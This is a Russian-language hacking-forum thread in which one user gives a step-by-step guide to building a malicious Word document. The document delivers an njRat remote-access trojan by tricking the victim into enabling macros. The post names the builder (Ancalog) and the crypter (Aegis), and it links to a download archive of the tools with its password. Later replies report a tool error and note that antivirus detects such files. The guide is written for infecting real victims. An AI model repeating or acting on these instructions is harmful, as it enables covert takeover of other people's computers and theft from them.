• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Прячем свой вирус в doc*

Moshennik

Moshennik

Moshennik

Резидент
Сообщения
199
Реакции
164
0 руб.
Telegram
Please note, if you want to make a deal with this user, that it is blocked.
Всем привет, сегодня я вам расскажу как стать на шаг ближе к статусу мамкиного кулхацкера.

Итак, суть в том, что в роли вредоноса будет выступать .doc файл. Да-да, обычный вордовский файл который даже можно загрузить и отправить через вк. При запуске у жертвы будет уведомление о том, что нужно включить макросы, также в документе картинкой будет прикреплена просьба их включить т.к. типа документ отображается некорректно. После включения вы получаете полный контроль над компьютером жертвы.

Теперь о том, что будет нужно. Нам понадобиться любой ратник, программа для склейки файлов (вы можете погуглить и написать свой макрос) и любой криптор на ваш вкус. Ссылки на те программы, которые использовал я будут ниже (не реклама).

НАСТОЯТЕЛЬНО РЕКОМЕНДУЮ ЗАПУСКАТЬ ВСЕ НА ВИРТУАЛКЕ.

1) Создаем наш payload в ратнике и криптуем его.

2) Запускаем программу для склейки, добавляем в картинки наше предупреждение (оно есть в архиве Ancalog'а).



0e17360ebf846328ff19a.jpg

3) Выбираем верхний пункт слева, нажимаем "GENERATE EXPLOIT FILE" и ставим наш закриптованный payload. Выскакивает предупреждение, жмем "ОК", далее выскакивает сообщение об успешном создании файла.

Все, файл готов, запускаете ратник и кидаете файл жертве.



Ссылка на скачивание: https://yadi.sk/d/c0hkJG-e3J3Vfa

По ссылке:

  • njRat
  • Ancalog Builder
  • Aegis Crypter
Пароль от архивов: docsploit
 
Shell Launcher - The shell to use if your computer is running slow | Пишем стилер биткоинов

darkIT

darkIT

darkIT

Участник
Сообщения
18
Реакции
4
0 руб.
Telegram
Там ещё была строчка в конце:
"Мануал написан моим другом, крутым кодером 1msorry !"
Нах вырезал?)
 

Moshennik

Moshennik

Moshennik

Резидент
Сообщения
199
Реакции
164
0 руб.
Telegram
Please note, if you want to make a deal with this user, that it is blocked.

winyer

W

winyer

Новичок
Сообщения
1
Реакции
0
0 руб.
Its show that:


[Window Title]
Ancalog Builder

[Content]
Unable to open file "D:\Archive\Ancalog Exploit Builder AchillePower/fl.dll".

Press OK to ignore and risk data corruption.
Press Cancel to kill the program.

[OK] [Cancel]
 

Vanessa

Гарант
Vanessa

Vanessa

Гарант
Команда форума
Админ
Сообщения
856
Реакции
2.217
0 руб.
Все равно любые макросы и подгрузка вируса палится всеми антивирусами
 
Войдите или зарегистрируйтесь для ответа.
Сверху Снизу